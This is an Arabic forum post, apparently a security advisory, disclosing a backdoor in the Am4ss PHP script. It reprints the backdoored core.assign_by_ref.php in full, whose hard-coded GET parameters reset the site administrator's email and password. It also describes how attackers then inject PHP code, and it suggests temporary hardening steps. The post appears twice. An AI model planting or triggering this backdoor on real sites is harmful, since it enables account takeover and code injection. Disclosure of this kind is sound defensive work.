loulou ange
11-01-2013, بتوقيت غرينيتش 03:27 AM
http://www.dzbatna.com/images/icons/icon26.gif [طھط±ظ‚ظٹط¹ ط«ط؛ط±ط© 0day ] : ط³ظƒط±ط¨طھ AM4SS (http://www.dzbatna.com/t2126096/)
بسم الله الرحمن الرحيم ....
ثغره برايفت في سكربت Am4ss نوع الثغره PHP Code Injection
الملف المصاب
libs/internals/core.assign_by_ref.php
محتوى الملف :
رمز PHP:
<code style="white-space:nowrap"> <code> <?php
if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب')
{
define('Am4ss', true);
require('../../requires/config.php');
@mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
@mysql_select_db($Config['DataBase']['Name']);
$sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = '[email protected] (http://www.cloudflare.com/email-protection)', password = '".md5('kawkawa')."' where userid = '1'");
if($sql)
{
echo 'تم التحديث update للموقع: ' . $_SERVER['HTTP_HOST'];
} else
{
die(mysql_error());
}
} else
{
echo 'البيانات خاطئة';
}
?> </code> </code>
السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده
الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم
ومن ثم يقوم المخُترق بحقن كود code بي اتش بي في صفحه من صفحات الموقع
-----------------------------------------
ترقيع الثغره ( مؤقتا ) .. تغيير مسار لوحة التحكم ووضع جدار ناري عليها وعلى هذه المجلدات :
am4ss_cache
templates
لان هذه المجلدات تحمل تصريح 777
وبالتوفيق للجميع
أللهم بلغت اللهم فاشهد ...
تحياتي
Cyber_RoOT
http://www.dzbatna.com/images/smilies/blushing.gif
التعديل الأخير كان بواسطة عذابي غير; 21 - 07 - 2014 الساعة 02:25
ألعاب الأندرويد مجانا و حصريا (http://www.apotox.info/forum)
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
بسم الله الرحمن الرحيم ....
ثغره برايفت في سكربت Am4ss نوع الثغره PHP Code Injection
الملف المصاب
libs/internals/core.assign_by_ref.php
محتوى الملف :
رمز PHP:
<code style="white-space:nowrap"> <code> <?php
if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب')
{
define('Am4ss', true);
require('../../requires/config.php');
@mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
@mysql_select_db($Config['DataBase']['Name']);
$sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = '[email protected] (http://www.cloudflare.com/email-protection)', password = '".md5('kawkawa')."' where userid = '1'");
if($sql)
{
echo 'تم التحديث update للموقع: ' . $_SERVER['HTTP_HOST'];
} else
{
die(mysql_error());
}
} else
{
echo 'البيانات خاطئة';
}
?> </code> </code>
السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده
الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم
ومن ثم يقوم المخُترق بحقن كود code بي اتش بي في صفحه من صفحات الموقع
-----------------------------------------
ترقيع الثغره ( مؤقتا ) .. تغيير مسار لوحة التحكم ووضع جدار ناري عليها وعلى هذه المجلدات :
am4ss_cache
templates
لان هذه المجلدات تحمل تصريح 777
وبالتوفيق للجميع
أللهم بلغت اللهم فاشهد ...
تحياتي
Cyber_RoOT
http://www.dzbatna.com/images/smilies/blushing.gif
التعديل الأخير كان بواسطة عذابي غير; 21 - 07 - 2014 الساعة 02:25
ألعاب الأندرويد مجانا و حصريا (http://www.apotox.info/forum)
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©